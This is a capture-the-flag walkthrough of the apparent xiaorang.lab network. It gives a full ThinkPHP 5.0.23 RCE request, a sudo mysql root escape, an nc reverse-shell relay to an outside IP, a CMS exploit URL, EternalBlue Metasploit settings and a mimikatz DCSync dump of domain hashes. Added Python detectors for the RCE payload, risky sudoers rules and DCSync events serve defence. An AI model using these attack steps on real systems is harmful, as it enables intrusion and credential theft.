Flag01

The entry point is a login page. Scanning it turns up an error page that reveals the ThinkPHP version.

ThinkPHP 5.0.23 RCE

Write a webshell or get a reverse shell:

POST /index.php?s=captcha HTTP/1.1
Host: 39.99.252.41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Origin: http://39.99.252.41
Connection: close
Referer: http://39.99.252.41/index.php?s=captcha
Upgrade-Insecure-Requests: 1

_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=ls /
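As an added defender-side example (not code from the original write-up), the following parser flags the parameter combination this request relies on, the way a WAF rule or a log post-processor would; the sample bodies at the bottom are constructed.

```python
"""Detect the ThinkPHP 5.0.23 _method=__construct RCE pattern in POST bodies.

Added defender example, not code from the original write-up. It parses the
URL-encoded body of a request the way a WAF rule or log parser would and
flags the parameter combination the public exploit relies on. The sample
bodies at the bottom are constructed.
"""
from urllib.parse import parse_qs

# PHP callables typically smuggled through filter[] in this exploit.
DANGEROUS_CALLABLES = {"system", "exec", "shell_exec", "passthru", "assert"}


def is_thinkphp_method_rce(body: str) -> bool:
    """Return True when the body matches the ThinkPHP 5.0.23 method-override RCE."""
    params = parse_qs(body, keep_blank_values=True)
    # 1. _method is abused to route the request into Request::__construct.
    if params.get("_method", [""])[0].lower() != "__construct":
        return False
    # 2. filter[] (or filter) injects a callable applied to request data.
    filters = {v.lower() for v in params.get("filter[]", []) + params.get("filter", [])}
    if not filters & DANGEROUS_CALLABLES:
        return False
    # 3. A server[...] or get[...] override carries the command string.
    return any(k.startswith(("server[", "get[")) for k in params)


def find_rce_requests(bodies):
    """Return the indexes of bodies that match the RCE pattern."""
    return [i for i, b in enumerate(bodies) if is_thinkphp_method_rce(b)]


# Constructed samples: the first mirrors the request shown above,
# the second is an ordinary login, the third overrides _method but
# only injects the harmless 'trim' filter.
SAMPLE_BODIES = [
    "_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=ls+/",
    "username=admin&password=secret&_method=POST",
    "_method=__construct&filter%5B%5D=trim&server%5BREQUEST_METHOD%5D=x",
]

if __name__ == "__main__":
    print(find_rce_requests(SAMPLE_BODIES))  # [0]
```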

Privilege escalation

sudo -l lists the commands the current user may run through sudo.

Running it shows:

(root) NOPASSWORD: /usr/bin/mysql

This means the current user (www-data) can run mysql as root through sudo without a password.

mysql can execute system commands:

mysql -e '\! id'
/*
-e: MySQL client option that executes the statement that follows.
\! id: runs an external system command from inside the MySQL client. \! is a special escape in the MySQL client for executing external system commands.
*/

We can use this to escalate to root and spawn a shell:

sudo /usr/bin/mysql -e '\! /bin/sh'

But the spawned shell has no output: commands run but nothing comes back, so use two nc connections to relay the output:

nc 47.120.32.120 10000| /bin/bash | nc 47.120.32.120 10001
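As an added defender-side example (not part of the original write-up), this audit parses sudoers user-spec lines and flags the kind of rule abused above: a NOPASSWD grant of root to a program whose own command escape (mysql's \! here) yields a shell. The rules in the sample are constructed.

```python
"""Audit sudoers rules for passwordless root access to shell-capable programs.

Added defender example, not part of the original write-up. It parses
user-spec lines in sudoers syntax (/etc/sudoers or a sudoers.d file) and
flags rules like the one abused above: a low-privileged user allowed to run
a client such as mysql as root with NOPASSWD, where the client's built-in
command escape (\\! in mysql) gives a root shell. The rules are constructed.
"""
import re
from os.path import basename

# Programs with a built-in way to run an external command; extend as needed.
SHELL_CAPABLE = {"mysql", "psql", "vim", "vi", "less", "more", "python3", "perl", "find", "awk"}

# user host=(runas) TAG: cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text: str):
    """Return (user, runas, program) for each NOPASSWD rule that grants root to a shell-capable program."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        m = RULE_RE.match(line)
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        runas_user = m["runas"].split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        for cmd in m["cmds"].split(","):
            prog = cmd.strip().split()[0] if cmd.strip() else ""
            if prog == "ALL" or basename(prog) in SHELL_CAPABLE:
                findings.append((m["user"], runas_user, prog))
    return findings


# Constructed sample sudoers content.
SAMPLE_SUDOERS = """
# comments are ignored
www-data ALL=(root) NOPASSWD: /usr/bin/mysql
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less
deploy   ALL=(root) /usr/bin/systemctl restart app
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```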

flag01 is at /root/flag/flag01.txt


start infoscan
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.18 is alive
(icmp) Target 172.22.1.21 is alive
(icmp) Target 172.22.1.2 is alive
[*] Icmp alive hosts len is: 4
172.22.1.2:445 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:139 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:135 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 8.299997311s

Flag02

The fscan output above shows one MS17-010 host and one web site; look at the web site first.

It is a CMS with a publicly available EXP; use it to write a webshell.


http://172.22.1.18/task.php/?m=qcloudCos|runt&a=run&fileid=12


Flag03

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.22.1.21 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/bind_tcp_uuid):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 172.22.1.21 no The target address


Exploit target:

Id Name
-- ----
0 Automatic Target

Run EternalBlue.

Flag04

With the EternalBlue host in hand, run a DCSync attack.

DCSync works by abusing the data replication that domain controllers perform among themselves.
DCSync is a commonly used credential-theft technique in AD domain penetration. By default, the DCs in a domain synchronize with each other every 15 minutes; when one DC synchronizes from another, the requesting side uses the Directory Replication Service protocol (MS-DRSR) to replicate the domain users' password data from the other DC. DCSync exploits this by "impersonating" a DC and sending a replication request to a real DC to obtain user credential data. Because the attack uses Windows RPC and requires neither logging on to the DC nor dropping files on it, it avoids triggering EDR alerts, which makes DCSync a very stealthy way to steal credentials.
Prerequisites for a DCSync attack:
To perform DCSync you must hold the privileges of one of the following:
a member of the Administrators group
a member of the Domain Admins group
a member of the Enterprise Admins group
the computer account of a domain controller
In other words, by default the domain admins group has this right.
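As an added defender-side example (not part of the original write-up), the following check turns the replication behaviour described above into a detection: a DCSync pull makes the DC log Security event 4662 whose Properties carry the replication extended rights by GUID, and a request from anything other than a DC computer account is the signal. The events are constructed samples; the DC account set is an assumption based on the DC01 host in the scan output.

```python
"""Spot DCSync replication requests in Windows Security event 4662.

Added defender example, not part of the original write-up. When an account
pulls directory data over MS-DRSR, the domain controller logs event 4662
whose Properties list the replication extended rights by GUID. A request
not made by a DC's own computer account is the DCSync signal. The events
below are constructed samples; DC_ACCOUNTS is an assumption for xiaorang.lab.
"""

# Well-known extended-right GUIDs used for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DC_ACCOUNTS = {"DC01$"}  # assumption: computer accounts of legitimate DCs
CONTROL_ACCESS = 0x100   # AccessMask bit set when an extended right is used


def find_dcsync(events):
    """Return (subject, [rights]) for 4662 events that look like DCSync."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        subject = ev.get("SubjectUserName", "")
        # Get-Changes-All is the right that exposes password hashes, and
        # legitimate replication comes only from DC computer accounts.
        if "DS-Replication-Get-Changes-All" in rights and subject not in DC_ACCOUNTS:
            hits.append((subject, rights))
    return hits


# Constructed sample events (fields as they appear in 4662 EventData).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",      # normal DC-to-DC replication
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "attacker_user", "AccessMask": "0x100",  # DCSync from a user account
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "attacker_user", "AccessMask": "0x20",   # plain read, no control access
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```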
On the MS17-010 host we compromised, load mimikatz; the session there already runs as SYSTEM.
Load mimikatz:
meterpreter> load kiwi
meterpreter> kiwi_cmd privilege::debug (elevate privileges; this requires SYSTEM)
Dump the domain hashes:

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ edc506302bf9b040febfb84a1459c0e8 532480
1104 XIAORANG-OA01$ 673ec2d0ad2f73341c4b3e1fc2fbade5 4096
1103 XIAORANG-WIN7$ 507797b66f76b8b71d20555b0c59f86d 4096
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
